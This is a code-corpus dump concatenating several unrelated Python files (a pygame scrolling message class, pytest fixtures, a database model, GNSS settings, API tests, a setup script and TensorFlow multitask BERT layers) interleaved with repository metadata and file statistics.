self._outline_text = self._font.render(
self._text,
self._settings.settings['text_aa'],
self._settings.outline_colour
)
def _set_item_content(self) -> None:
"""
Render the message text.
Returns:
None
"""
self.content = self._font.render(
self._text,
self._settings.settings['text_aa'],
self._settings.text_colour
)
def _place_item(self) -> None:
"""
Set the initial object position on the screen.
Returns:
None
"""
self._rect.midleft = self._screen_rect.midright
def _draw_outline(self) -> None:
"""
Draw the message text outline.
Returns:
None
"""
outline_width = self._settings.settings['outline_width']
self._screen.blit(self._outline_text, (self._rect.x - outline_width, self._rect.y - outline_width))
self._screen.blit(self._outline_text, (self._rect.x - outline_width, self._rect.y + outline_width))
self._screen.blit(self._outline_text, (self._rect.x + outline_width, self._rect.y - outline_width))
self._screen.blit(self._outline_text, (self._rect.x + outline_width, self._rect.y + outline_width))
def blit(self) -> None:
"""
Add the object to the pygame screen.
Returns:
None
"""
# Draw outline text
self._draw_outline()
# Draw the message
self._set_item_content()
# Run parent method
super().blit()
def update(self) -> None:
"""
Move the object position to the left during a frame update.
Returns:
None
"""
self._x -= self._settings.settings['text_speed'] / self._settings.settings['fps']
self._rect.x = self._x
def is_on_screen(self) -> bool:
"""
Determine whether the object is still on the screen.
Returns:
bool: True if still on screen, False otherwise.
"""
if self._rect.right <= self._screen_rect.left:
return False
return True
def has_just_emerged(self) -> bool:
"""
Determine whether the right side of the message is now visible on the screen.
Returns:
bool: True if right edge is now on screen, False otherwise.
"""
if not self._has_fully_emerged and self._rect.right <= self._screen_rect.right:
self._has_fully_emerged = True
return True
return False
| 27.147887 | 107 | 0.575357 | 450 | 3,855 | 4.682222 | 0.22 | 0.049359 | 0.068344 | 0.045088 | 0.298054 | 0.249644 | 0.224015 | 0.197437 | 0.197437 | 0.197437 | 0 | 0 | 0.332815 | 3,855 | 141 | 108 | 27.340426 | 0.819207 | 0.307912 | 0 | 0.170213 | 0 | 0 | 0.017809 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212766 | false | 0 | 0.021277 | 0 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3bea2de7d4525c6881fb3abdb31815d971e7131 | 506 | py | Python | tests/conftest.py | Beanxx/alonememo | aa90bcca6a5dcaa41305b162ac5d6dbe8d0d2562 | [
"MIT"
] | null | null | null | tests/conftest.py | Beanxx/alonememo | aa90bcca6a5dcaa41305b162ac5d6dbe8d0d2562 | [
"MIT"
] | null | null | null | tests/conftest.py | Beanxx/alonememo | aa90bcca6a5dcaa41305b162ac5d6dbe8d0d2562 | [
"MIT"
] | null | null | null | import pytest
from pymongo import MongoClient
import app as flask_app
test_database_name = 'spartatest'
client = MongoClient('localhost', 27017)
db = client.get_database(test_database_name)
@pytest.fixture
def app():
test_app = flask_app.create_app(test_database_name)
# 제네레이터 문법(yield 구문까지만 실행하고 대기,
# 이후 다시 호출할 때 yield 구문 다음이 진행됨)
# app이 종료되는 것이 아니라 stop됨.
yield test_app
# 여기서부터는 모든 테스트가 완료되고 나서 시행됨
client.drop_database(test_database_name)
print('테스트 DB 제거 완료')
| 20.24 | 55 | 0.727273 | 78 | 506 | 4.525641 | 0.628205 | 0.135977 | 0.181303 | 0.107649 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012346 | 0.199605 | 506 | 24 | 56 | 21.083333 | 0.859259 | 0.217391 | 0 | 0 | 0 | 0 | 0.079487 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.25 | 0 | 0.333333 | 0.083333 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3c0c248eab748f6973cc1f7d32930648b9e6320 | 1,825 | py | Python | challenges/challenge.py | Tech-With-Tim/models | 221fce614776df01b151e73071c788c3ce57dc52 | [
"MIT"
] | 2 | 2021-07-09T18:53:15.000Z | 2021-08-06T06:21:14.000Z | challenges/challenge.py | Tech-With-Tim/models | 221fce614776df01b151e73071c788c3ce57dc52 | [
"MIT"
] | 8 | 2021-07-09T13:08:07.000Z | 2021-09-12T20:25:08.000Z | challenges/challenge.py | Tech-With-Tim/models | 221fce614776df01b151e73071c788c3ce57dc52 | [
"MIT"
] | 4 | 2021-07-09T12:32:20.000Z | 2021-07-29T15:19:25.000Z | from postDB import Model, Column, types
from datetime import datetime
import utils
class Challenge(Model):
"""
Challenge class to store the challenge details
Database Attributes:
Attributes stored in the `challenges` table.
:param int id: The challenge Snowflake ID.
:param str title: The challenge title.
:param int author_id: The challenge author's Discord ID.
:param str description: A description.
:param List[str] example_in: Example input.
:param List[str] example_out: Example output.
:param List[int] language_ids: The languages you can use to complete this challenge.
:param :class:`datetime` released_at: The time this challenge was released at.
:param bool deleted: Whether or not this challenge has been deleted.
:param str slug: The URL slug this challenge relates to.
"""
id = Column(types.Integer(big=True), primary_key=True)
title = Column(types.String, unique=True)
author_id = Column(
types.ForeignKey("users", "id", sql_type=types.Integer(big=True)),
)
description = Column(types.String)
example_in = Column(types.Array(types.String))
example_out = Column(types.Array(types.String))
# Implicit ForeignKey to ChallengeLanguage.id
language_ids = Column(types.Array(types.Integer(big=True)))
released_at = Column(types.DateTime, nullable=True)
deleted = Column(types.Boolean, default=False)
slug = Column(types.String, unique=True)
@property
def created_at(self) -> datetime:
"""Returns the time the challenge was created"""
return utils.snowflake_time(self.id)
| 40.555556 | 101 | 0.633973 | 217 | 1,825 | 5.267281 | 0.37788 | 0.105862 | 0.03937 | 0.049869 | 0.094488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.282192 | 1,825 | 44 | 102 | 41.477273 | 0.872519 | 0.525479 | 0 | 0 | 0 | 0 | 0.008783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.157895 | 0 | 0.842105 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
d3c2f371f8e9bd53dfa26410d72fcf0c4b952e00 | 1,004 | py | Python | settings.py | embrace-inpe/cycle-slip-correction | c465dd4d45ea7df63a18749e26ba4bf0aa27eb59 | [
"MIT"
] | 6 | 2019-05-20T21:23:41.000Z | 2021-06-23T15:00:30.000Z | settings.py | embrace-inpe/cycle-slip-correction | c465dd4d45ea7df63a18749e26ba4bf0aa27eb59 | [
"MIT"
] | null | null | null | settings.py | embrace-inpe/cycle-slip-correction | c465dd4d45ea7df63a18749e26ba4bf0aa27eb59 | [
"MIT"
] | 5 | 2018-12-27T16:46:45.000Z | 2020-09-14T13:44:00.000Z | """
Commom settings to all applications
"""
A = 40.3
TECU = 1.0e16
C = 299792458
F1 = 1.57542e9
F2 = 1.22760e9
factor_1 = (F1 - F2) / (F1 + F2) / C
factor_2 = (F1 * F2) / (F2 - F1) / C
DIFF_TEC_MAX = 0.05
LIMIT_STD = 7.5
plot_it = True
REQUIRED_VERSION = 3.01
CONSTELLATIONS = ['G', 'R']
COLUMNS_IN_RINEX = {'3.03': {'G': {'L1': 'L1C', 'L2': 'L2W', 'C1': 'C1C', 'P1': 'C1W', 'P2': 'C2W'},
'R': {'L1': 'L1C', 'L2': 'L2C', 'C1': 'C1C', 'P1': 'C1P', 'P2': 'C2P'}
},
'3.02': {'G': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1W', 'P2': 'C2W'},
'R': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1P', 'P2': 'C2P'}
},
'3.01': {'G': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1W', 'P2': 'C2W'},
'R': {'L1': 'L1', 'L2': 'L2', 'C1': 'C1C', 'P1': 'C1P', 'P2': 'C2P'}
}
}
| 33.466667 | 100 | 0.351594 | 127 | 1,004 | 2.708661 | 0.433071 | 0.087209 | 0.122093 | 0.093023 | 0.380814 | 0.380814 | 0.380814 | 0.331395 | 0.27907 | 0.27907 | 0 | 0.18859 | 0.371514 | 1,004 | 29 | 101 | 34.62069 | 0.356577 | 0.034861 | 0 | 0.090909 | 0 | 0 | 0.168574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3c3d276986b71cc9d8aae788f2dcd9c3f2eb96a | 1,009 | py | Python | tests/api/test_libcoap_api.py | ggravlingen/ikeatradfri | 9eef5317ab770de874c407449489604b2fdf35f1 | [
"MIT"
] | 726 | 2017-04-12T22:55:39.000Z | 2020-09-02T20:47:13.000Z | tests/api/test_libcoap_api.py | ggravlingen/ikeatradfri | 9eef5317ab770de874c407449489604b2fdf35f1 | [
"MIT"
] | 248 | 2017-04-12T21:45:10.000Z | 2020-09-03T08:48:37.000Z | tests/api/test_libcoap_api.py | ggravlingen/ikeatradfri | 9eef5317ab770de874c407449489604b2fdf35f1 | [
"MIT"
] | 140 | 2017-04-12T20:02:57.000Z | 2020-09-02T08:54:23.000Z | """Test API utilities."""
import json
from pytradfri.api.libcoap_api import APIFactory
from pytradfri.gateway import Gateway
def test_constructor_timeout_passed_to_subprocess(monkeypatch):
"""Test that original timeout is passed to subprocess."""
capture = {}
def capture_args(*args, **kwargs):
capture.update(kwargs)
return json.dumps([])
monkeypatch.setattr("subprocess.check_output", capture_args)
api = APIFactory("anything", timeout=20, psk="abc")
api.request(Gateway().get_devices())
assert capture["timeout"] == 20
def test_custom_timeout_passed_to_subprocess(monkeypatch):
"""Test that custom timeout is passed to subprocess."""
capture = {}
def capture_args(*args, **kwargs):
capture.update(kwargs)
return json.dumps([])
monkeypatch.setattr("subprocess.check_output", capture_args)
api = APIFactory("anything", psk="abc")
api.request(Gateway().get_devices(), timeout=1)
assert capture["timeout"] == 1
| 28.027778 | 64 | 0.698712 | 119 | 1,009 | 5.764706 | 0.327731 | 0.046647 | 0.104956 | 0.072886 | 0.699708 | 0.699708 | 0.699708 | 0.475219 | 0.475219 | 0.475219 | 0 | 0.007186 | 0.172448 | 1,009 | 35 | 65 | 28.828571 | 0.814371 | 0.119921 | 0 | 0.47619 | 0 | 0 | 0.094037 | 0.052752 | 0 | 0 | 0 | 0 | 0.095238 | 1 | 0.190476 | false | 0.095238 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
d3c5d75262328f54482b5a9f8b47cfdc49c36760 | 445 | py | Python | setup.py | korymath/JANN | 98468a2e90a6b55ccb15e905ee10a1d1130cf5d8 | [
"MIT"
] | 39 | 2018-09-25T21:40:38.000Z | 2022-01-19T23:26:51.000Z | setup.py | korymath/JANN | 98468a2e90a6b55ccb15e905ee10a1d1130cf5d8 | [
"MIT"
] | 22 | 2018-09-25T21:36:46.000Z | 2021-09-07T16:03:41.000Z | setup.py | korymath/JANN | 98468a2e90a6b55ccb15e905ee10a1d1130cf5d8 | [
"MIT"
] | 9 | 2018-09-26T00:38:35.000Z | 2020-02-27T05:59:03.000Z | from setuptools import setup
from setuptools import find_packages
setup(
name="Jann",
version="4.0.0",
description="Jann is a Nearest Neighbour retrieval-based chatbot.",
author="Kory Mathewson",
author_email="korymath@gmail.com",
license="MIT",
url="https://github.com/korymath/jann",
packages=find_packages(),
setup_requires=[
"pytest-runner"
],
tests_require=[
"pytest"
],
)
| 20.227273 | 71 | 0.647191 | 51 | 445 | 5.54902 | 0.705882 | 0.09894 | 0.141343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008646 | 0.220225 | 445 | 21 | 72 | 21.190476 | 0.806916 | 0 | 0 | 0.111111 | 0 | 0 | 0.331081 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3cb4fc2b23e4f4fb2c765f3d7673f2b43240708 | 19,911 | py | Python | bert_multitask_learning/top.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | 1 | 2021-07-11T14:07:59.000Z | 2021-07-11T14:07:59.000Z | bert_multitask_learning/top.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | bert_multitask_learning/top.py | akashnd/bert-multitask-learning | aee5be006ef6a3feadf0c751a6f9b42c24c3fd21 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: source_nbs/12_top.ipynb (unless otherwise specified).
__all__ = ['empty_tensor_handling_loss', 'nan_loss_handling', 'create_dummy_if_empty', 'BaseTop', 'SequenceLabel',
'Classification', 'PreTrain', 'Seq2Seq', 'MultiLabelClassification', 'MaskLM']
# Cell
import logging
from functools import partial
from typing import Dict, Tuple, Union
import tensorflow as tf
import tensorflow_addons as tfa
import transformers
from transformers.modeling_tf_utils import TFSharedEmbeddings
from tensorflow_addons.layers.crf import CRF
from tensorflow_addons.text.crf import crf_log_likelihood
from .params import BaseParams
from .utils import gather_indexes
@tf.function
def empty_tensor_handling_loss(labels, logits, loss_fn):
if tf.equal(tf.size(labels), 0):
return 0.0
if tf.equal(tf.size(tf.shape(labels)), 0):
return 0.0
if tf.equal(tf.shape(labels)[0], 0):
return 0.0
else:
return tf.reduce_mean(loss_fn(
labels, logits, from_logits=True))
@tf.function
def nan_loss_handling(loss):
if tf.math.is_nan(loss):
return 0.0
else:
return loss
@tf.function
def create_dummy_if_empty(inp_tensor: tf.Tensor) -> tf.Tensor:
shape_tensor = tf.shape(inp_tensor)
if tf.equal(shape_tensor[0], 0):
data_type = inp_tensor.dtype
dummy_shape_first_dim = tf.convert_to_tensor([1], dtype=tf.int32)
dummy_shape = tf.concat(
[dummy_shape_first_dim, shape_tensor[1:]], axis=0)
dummy_tensor = tf.zeros(dummy_shape, dtype=data_type)
return dummy_tensor
else:
return inp_tensor
class BaseTop(tf.keras.Model):
def __init__(self, params: BaseParams, problem_name: str) -> None:
super(BaseTop, self).__init__(name=problem_name)
self.params = params
self.problem_name = problem_name
def call(self, inputs: Tuple[Dict], mode: str):
raise NotImplementedError
# Cell
class SequenceLabel(tf.keras.Model):
def __init__(self, params: BaseParams, problem_name: str):
super(SequenceLabel, self).__init__(name=problem_name)
self.params = params
self.problem_name = problem_name
num_classes = self.params.num_classes[self.problem_name]
self.dense = tf.keras.layers.Dense(num_classes, activation=None)
self.dropout = tf.keras.layers.Dropout(1-params.dropout_keep_prob)
if self.params.crf:
self.crf = CRF(num_classes)
self.metric_fn = tf.keras.metrics.Accuracy(
name='{}_acc'.format(self.problem_name)
)
else:
self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(
name='{}_acc'.format(self.problem_name))
def return_crf_result(self, labels: tf.Tensor, logits: tf.Tensor, mode: str, input_mask: tf.Tensor):
input_mask.set_shape([None, None])
logits = create_dummy_if_empty(logits)
input_mask = create_dummy_if_empty(input_mask)
viterbi_decoded, potentials, sequence_length, chain_kernel = self.crf(
logits, input_mask)
if mode != tf.estimator.ModeKeys.PREDICT:
loss = -crf_log_likelihood(potentials,
labels, sequence_length, chain_kernel)[0]
loss = tf.reduce_mean(loss)
loss = nan_loss_handling(loss)
self.add_loss(loss)
acc = self.metric_fn(
labels, viterbi_decoded, sample_weight=input_mask)
self.add_metric(acc)
# make the crf prediction has the same shape as non-crf prediction
return tf.one_hot(viterbi_decoded, name='%s_predict' % self.problem_name, depth=self.params.num_classes[self.problem_name])
def call(self, inputs, mode):
training = (mode == tf.estimator.ModeKeys.TRAIN)
feature, hidden_feature = inputs
hidden_feature = hidden_feature['seq']
if mode != tf.estimator.ModeKeys.PREDICT:
labels = feature['{}_label_ids'.format(self.problem_name)]
# sometimes the length of labels dose not equal to length of inputs
# that's caused by tf.data.experimental.bucket_by_sequence_length in multi problem scenario
pad_len = tf.shape(input=hidden_feature)[
1] - tf.shape(input=labels)[1]
# top, bottom, left, right
pad_tensor = [[0, 0], [0, pad_len]]
labels = tf.pad(tensor=labels, paddings=pad_tensor)
else:
labels = None
hidden_feature = self.dropout(hidden_feature, training)
if self.params.crf:
return self.return_crf_result(labels, hidden_feature, mode, feature['model_input_mask'])
logits = self.dense(hidden_feature)
if mode != tf.estimator.ModeKeys.PREDICT:
loss = empty_tensor_handling_loss(
labels, logits,
tf.keras.losses.sparse_categorical_crossentropy)
self.add_loss(loss)
acc = self.metric_fn(
labels, logits, sample_weight=feature['model_input_mask'])
self.add_metric(acc)
return tf.nn.softmax(
logits, name='%s_predict' % self.problem_name)
# Cell
class Classification(tf.keras.layers.Layer):
def __init__(self, params: BaseParams, problem_name: str) -> None:
super(Classification, self).__init__(name=problem_name)
self.params = params
self.problem_name = problem_name
num_classes = self.params.num_classes[self.problem_name]
self.dense = tf.keras.layers.Dense(num_classes, activation=None)
self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(
name='{}_acc'.format(self.problem_name))
self.dropout = tf.keras.layers.Dropout(1-params.dropout_keep_prob)
def call(self, inputs, mode):
training = (mode == tf.estimator.ModeKeys.TRAIN)
feature, hidden_feature = inputs
hidden_feature = hidden_feature['pooled']
if mode != tf.estimator.ModeKeys.PREDICT:
labels = feature['{}_label_ids'.format(self.problem_name)]
else:
labels = None
hidden_feature = self.dropout(hidden_feature, training)
logits = self.dense(hidden_feature)
if mode != tf.estimator.ModeKeys.PREDICT:
# labels = tf.squeeze(labels)
# convert labels to one-hot to use label_smoothing
one_hot_labels = tf.one_hot(
labels, depth=self.params.num_classes[self.problem_name])
loss_fn = partial(tf.keras.losses.categorical_crossentropy,
from_logits=True, label_smoothing=self.params.label_smoothing)
loss = empty_tensor_handling_loss(
one_hot_labels, logits,
loss_fn)
loss = nan_loss_handling(loss)
self.add_loss(loss)
acc = self.metric_fn(labels, logits)
self.add_metric(acc)
return tf.nn.softmax(
logits, name='%s_predict' % self.problem_name)
# Cell
class PreTrain(tf.keras.Model):
def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.Tensor=None, share_embedding=True):
super(PreTrain, self).__init__(name=problem_name)
self.params = params
self.nsp = transformers.models.bert.modeling_tf_bert.TFBertNSPHead(
self.params.bert_config)
if share_embedding is False:
self.vocab_size = self.params.bert_config.vocab_size
self.share_embedding = False
else:
word_embedding_weight = input_embeddings.word_embeddings
self.vocab_size = word_embedding_weight.shape[0]
embedding_size = word_embedding_weight.shape[-1]
share_valid = (self.params.bert_config.hidden_size ==
embedding_size)
if not share_valid and self.params.share_embedding:
logging.warning(
'Share embedding is enabled but hidden_size != embedding_size')
self.share_embedding = self.params.share_embedding & share_valid
if self.share_embedding:
self.share_embedding_layer = TFSharedEmbeddings(
vocab_size=word_embedding_weight.shape[0], hidden_size=word_embedding_weight.shape[1])
self.share_embedding_layer.build([1])
self.share_embedding_layer.weight = word_embedding_weight
else:
self.share_embedding_layer = tf.keras.layers.Dense(self.vocab_size)
def call(self,
inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],
mode: str) -> Tuple[tf.Tensor, tf.Tensor]:
features, hidden_features = inputs
# compute logits
nsp_logits = self.nsp(hidden_features['pooled'])
# masking is done inside the model
seq_hidden_feature = hidden_features['seq']
if mode != tf.estimator.ModeKeys.PREDICT:
positions = features['masked_lm_positions']
# gather_indexes will flatten the seq hidden_states, we need to reshape
# back to 3d tensor
input_tensor = gather_indexes(seq_hidden_feature, positions)
shape_tensor = tf.shape(positions)
shape_list = tf.concat(
[shape_tensor, [seq_hidden_feature.shape.as_list()[-1]]], axis=0)
input_tensor = tf.reshape(input_tensor, shape=shape_list)
# set_shape to determin rank
input_tensor.set_shape(
[None, None, seq_hidden_feature.shape.as_list()[-1]])
else:
input_tensor = seq_hidden_feature
if self.share_embedding:
mlm_logits = self.share_embedding_layer(
input_tensor, mode='linear')
else:
mlm_logits = self.share_embedding_layer(input_tensor)
if mode != tf.estimator.ModeKeys.PREDICT:
nsp_labels = features['next_sentence_label_ids']
mlm_labels = features['masked_lm_ids']
mlm_labels.set_shape([None, None])
# compute loss
nsp_loss = empty_tensor_handling_loss(
nsp_labels, nsp_logits,
tf.keras.losses.sparse_categorical_crossentropy)
mlm_loss_layer = transformers.modeling_tf_utils.TFMaskedLanguageModelingLoss()
# mlm_loss = tf.reduce_mean(
# mlm_loss_layer.compute_loss(mlm_labels, mlm_logits))
# add a useless from_logits argument to match the function signature of keras losses.
def loss_fn_wrapper(labels, logits, from_logits=True):
return mlm_loss_layer.compute_loss(labels, logits)
mlm_loss = empty_tensor_handling_loss(
mlm_labels,
mlm_logits,
loss_fn_wrapper
)
loss = nsp_loss + mlm_loss
self.add_loss(loss)
return (tf.sigmoid(nsp_logits), tf.nn.softmax(mlm_logits))
# Cell
class Seq2Seq(tf.keras.Model):
def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.keras.layers.Layer):
super(Seq2Seq, self).__init__(name=problem_name)
# self.params = params
# self.problem_name = problem_name
# # if self.params.init_weight_from_huggingface:
# # self.decoder = load_transformer_model(
# # self.params.transformer_decoder_model_name,
# # self.params.transformer_decoder_model_loading)
# # else:
# # self.decoder = load_transformer_model(
# # self.params.bert_decoder_config, self.params.transformer_decoder_model_loading)
# # TODO: better implementation
# logging.warning(
# 'Seq2Seq model is not well supported yet. Bugs are expected.')
# config = self.params.bert_decoder_config
# # some hacky approach to share embeddings from encoder to decoder
# word_embedding_weight = input_embeddings.word_embeddings
# self.vocab_size = word_embedding_weight.shape[0]
# self.share_embedding_layer = TFSharedEmbeddings(
# vocab_size=word_embedding_weight.shape[0], hidden_size=word_embedding_weight.shape[1])
# self.share_embedding_layer.build([1])
# self.share_embedding_layer.weight = word_embedding_weight
# # self.decoder = TFBartDecoder(
# # config=config, embed_tokens=self.share_embedding_layer)
# self.decoder = TFBartDecoderForConditionalGeneration(
# config=config, embedding_layer=self.share_embedding_layer)
# self.decoder.set_bos_id(self.params.bos_id)
# self.decoder.set_eos_id(self.params.eos_id)
# self.metric_fn = tf.keras.metrics.SparseCategoricalAccuracy(
# name='{}_acc'.format(self.problem_name))
raise NotImplementedError
def _seq2seq_label_shift_right(self, labels: tf.Tensor, eos_id: int) -> tf.Tensor:
batch_eos_ids = tf.fill([tf.shape(labels)[0], 1], eos_id)
batch_eos_ids = tf.cast(batch_eos_ids, dtype=tf.int64)
decoder_lable = labels[:, 1:]
decoder_lable = tf.concat([decoder_lable, batch_eos_ids], axis=1)
return decoder_lable
def call(self,
inputs: Tuple[Dict[str, Dict[str, tf.Tensor]], Dict[str, Dict[str, tf.Tensor]]],
mode: str):
features, hidden_features = inputs
encoder_mask = features['model_input_mask']
if mode == tf.estimator.ModeKeys.PREDICT:
input_ids = None
decoder_padding_mask = None
else:
input_ids = features['%s_label_ids' % self.problem_name]
decoder_padding_mask = features['{}_mask'.format(
self.problem_name)]
if mode == tf.estimator.ModeKeys.PREDICT:
return self.decoder.generate(eos_token_id=self.params.eos_id, encoder_hidden_states=hidden_features['seq'])
else:
decoder_output = self.decoder(input_ids=input_ids,
encoder_hidden_states=hidden_features['seq'],
encoder_padding_mask=encoder_mask,
decoder_padding_mask=decoder_padding_mask,
decode_max_length=self.params.decode_max_seq_len,
mode=mode)
loss = decoder_output.loss
logits = decoder_output.logits
self.add_loss(loss)
decoder_label = self._seq2seq_label_shift_right(
features['%s_label_ids' % self.problem_name], eos_id=self.params.eos_id)
acc = self.metric_fn(decoder_label, logits)
self.add_metric(acc)
return logits
# Cell
class MultiLabelClassification(tf.keras.Model):
def __init__(self, params: BaseParams, problem_name: str) -> None:
super(MultiLabelClassification, self).__init__(name=problem_name)
self.params = params
self.problem_name = problem_name
self.dense = tf.keras.layers.Dense(
self.params.num_classes[problem_name])
self.dropout = tf.keras.layers.Dropout(
1-self.params.dropout_keep_prob
)
# self.metric_fn = tfa.metrics.F1Score(
# num_classes=self.params.num_classes[problem_name],
# threshold=self.params.multi_cls_threshold,
# average='macro',
# name='{}_f1'.format(problem_name))
def call(self, inputs, mode):
training = (mode == tf.estimator.ModeKeys.TRAIN)
feature, hidden_feature = inputs
hidden_feature = hidden_feature['pooled']
if mode != tf.estimator.ModeKeys.PREDICT:
labels = feature['{}_label_ids'.format(self.problem_name)]
else:
labels = None
hidden_feature = self.dropout(hidden_feature, training)
logits = self.dense(hidden_feature)
if mode != tf.estimator.ModeKeys.PREDICT:
labels = tf.cast(labels, tf.float32)
# use weighted loss
label_weights = self.params.multi_cls_positive_weight
def _loss_fn_wrapper(x, y, from_logits=True):
return tf.nn.weighted_cross_entropy_with_logits(x, y, pos_weight=label_weights, name='{}_loss'.format(self.problem_name))
loss = empty_tensor_handling_loss(
labels, logits, _loss_fn_wrapper)
loss = nan_loss_handling(loss)
self.add_loss(loss)
# labels = create_dummy_if_empty(labels)
# logits = create_dummy_if_empty(logits)
# f1 = self.metric_fn(labels, logits)
# self.add_metric(f1)
return tf.nn.sigmoid(
logits, name='%s_predict' % self.problem_name)
# Cell
class MaskLM(tf.keras.Model):
"""Multimodal MLM top layer.
"""
def __init__(self, params: BaseParams, problem_name: str, input_embeddings: tf.keras.layers.Layer=None, share_embedding=True) -> None:
super(MaskLM, self).__init__(name=problem_name)
self.params = params
self.problem_name = problem_name
if share_embedding is False:
self.vocab_size = self.params.bert_config.vocab_size
self.share_embedding = False
else:
word_embedding_weight = input_embeddings.word_embeddings
self.vocab_size = word_embedding_weight.shape[0]
embedding_size = word_embedding_weight.shape[-1]
share_valid = (self.params.bert_config.hidden_size ==
embedding_size)
if not share_valid and self.params.share_embedding:
logging.warning(
'Share embedding is enabled but hidden_size != embedding_size')
self.share_embedding = self.params.share_embedding & share_valid
if self.share_embedding:
self.share_embedding_layer = TFSharedEmbeddings(
vocab_size=self.vocab_size, hidden_size=word_embedding_weight.shape[1])
self.share_embedding_layer.build([1])
self.share_embedding_layer.weight = word_embedding_weight
else:
self.share_embedding_layer = tf.keras.layers.Dense(self.vocab_size)
def call(self, inputs, mode):
features, hidden_features = inputs
# masking is done inside the model
seq_hidden_feature = hidden_features['seq']
if mode != tf.estimator.ModeKeys.PREDICT:
positions = features['masked_lm_positions']
# gather_indexes will flatten the seq hidden_states, we need to reshape
# back to 3d tensor
input_tensor = gather_indexes(seq_hidden_feature, positions)
shape_tensor = tf.shape(positions)
shape_list = tf.concat([shape_tensor, [seq_hidden_feature.shape.as_list()[-1]]], axis=0)
input_tensor = tf.reshape(input_tensor, shape=shape_list)
# set_shape to determin rank
input_tensor.set_shape(
[None, None, seq_hidden_feature.shape.as_list()[-1]])
else:
input_tensor = seq_hidden_feature
if self.share_embedding:
mlm_logits = self.share_embedding_layer(
input_tensor, mode='linear')
else:
mlm_logits = self.share_embedding_layer(input_tensor)
if mode != tf.estimator.ModeKeys.PREDICT:
mlm_labels = features['masked_lm_ids']
mlm_labels.set_shape([None, None])
# compute loss
mlm_loss = empty_tensor_handling_loss(
mlm_labels,
mlm_logits,
tf.keras.losses.sparse_categorical_crossentropy
)
loss = nan_loss_handling(mlm_loss)
self.add_loss(loss)
return tf.nn.softmax(mlm_logits)
| 42.095137 | 138 | 0.638491 | 2,370 | 19,911 | 5.072996 | 0.117722 | 0.043916 | 0.03119 | 0.032521 | 0.650836 | 0.619313 | 0.570906 | 0.543625 | 0.513932 | 0.494968 | 0 | 0.004749 | 0.270303 | 19,911 | 472 | 139 | 42.184322 | 0.822768 | 0.135553 | 0 | 0.574018 | 1 | 0 | 0.033567 | 0.005487 | 0 | 0 | 0 | 0.002119 | 0 | 1 | 0.063444 | false | 0 | 0.033233 | 0.006042 | 0.178248 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
d3cc0271bb0d934fe7034974b1385e41735a694e | 447 | py | Python | strings/#387/strings.py | sharmarkei/DSA-Practice | c98e9f5ae1824d86f02d1002d908dc24c8be8812 | [
"MIT"
